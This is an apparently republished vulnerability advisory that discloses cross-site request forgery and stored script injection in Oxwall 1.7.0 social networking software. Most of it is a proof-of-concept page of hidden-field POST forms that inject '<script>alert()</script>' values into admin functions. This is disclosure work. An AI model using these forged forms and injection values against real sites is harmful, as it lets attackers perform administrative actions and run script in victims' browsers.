HackDig : Dig high-quality web security articles for hacker

Oxwall 1.7.0 Multiple CSRF And HTML Injection Vulnerabilities

2014-08-12 12:18


Oxwall 1.7.0 Multiple CSRF And HTML Injection Vulnerabilities

Vendor: Oxwall Software Foundation

Product web page: http://www.oxwall.org
Affected version: 1.7.0 (build 7907 and 7906)

Summary: Oxwall is unbelievably flexible and easy to use
PHP/MySQL social networking software platform.

Desc: Oxwall version 1.7.0 suffers from multiple cross-site
request forgery and stored xss vulnerabilities. The application
allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Input passed to several POST parameters is not properly
sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.

Tested on: Kali Linux 3.7-trunk-686-pae
Apache/2.2.22 (Debian)
PHP 5.4.4-13(apache2handler)
MySQL 5.5.28

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2014-5195
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5195.php



<title>Oxwall 1.7.0 Multiple CSRF And Stored XSS Vulnerabilities</title>

<form action="" method="POST">
<input type="hidden" name="form_name" value="add-role" />
<input type="hidden" name="label" value='"><script>alert(1);</script>' />
<input type="hidden" name="submit" value="Add" />
<input type="submit" value="Execute #1" />

<form action="" method="POST">
<input type="hidden" name="form_name"
value="account_type_49693e2b1cb50cad5c42b18a9103f146dcce2ec6" />
<input type="hidden" name="command" value="AddAccountType" />
<input type="hidden" name="key"
value="questions_account_type_5615100a931845eca8da20cfdf7327e0" />
<input type="hidden" name="prefix" value="base" />
<input type="hidden" name="accountTypeName" value="5615100a931845eca8da20cfdf7327e0"
<input type="hidden"
value='"><script>alert(2);</script>' />
<input type="hidden" name="role" value="12" />
<input type="submit" value="Execute #2" />

<form action="" method="POST">
<input type="hidden" name="form_name" value="qst_add_form" />
<input type="hidden" name="qst_name" value='"><script>alert(3);</script>'
<input type="hidden" name="qst_description" value="ZSL" />
<input type="hidden" name="qst_account_type[0]"
value="290365aadde35a97f11207ca7e4279cc" />
<input type="hidden" name="qst_section" value="f90cde5913235d172603cc4e7b9726e3" />
<input type="hidden" name="qst_answer_type" value="text" />
<input type="hidden" name="qst_possible_values" value="%5B%5D" />
<input type="hidden" name="year_range[to]" value="1996" />
<input type="hidden" name="year_range[from]" value="1930" />
<input type="hidden" name="qst_column_count" value="1" />
<input type="hidden" name="qst_required" value="" />
<input type="hidden" name="qst_on_sign_up" value="" />
<input type="hidden" name="qst_on_edit" value="" />
<input type="hidden" name="qst_on_view" value="" />
<input type="hidden" name="qst_on_search" value="" />
<input type="hidden" name="valuesStorage" value="%7B%7D" />
<input type="hidden" name="command" value="addQuestion" />
<input type="submit" value="Execute #3" />

<form action="" method="POST">
<input type="hidden" name="form_name"
value='restrictedUsernamesForm"><script>alert(4);</script>' />
<input type="hidden" name="restrictedUsername"
value='"><script>alert(5);</script>' />
<input type="hidden" name="addUsername" value="Add" />
<input type="submit" value="Execute #4 & #5" />




Source: 5510704102-BLW/eussi/moc.ytirucesxc

Read:8184 | Comments:1 | Tags:No Tag

“Oxwall 1.7.0 Multiple CSRF And HTML Injection Vulnerabilities”0 Comments

Submit A Comment



Blog :

Verification Code:


Share high-quality web security related articles with you:)


Tag Cloud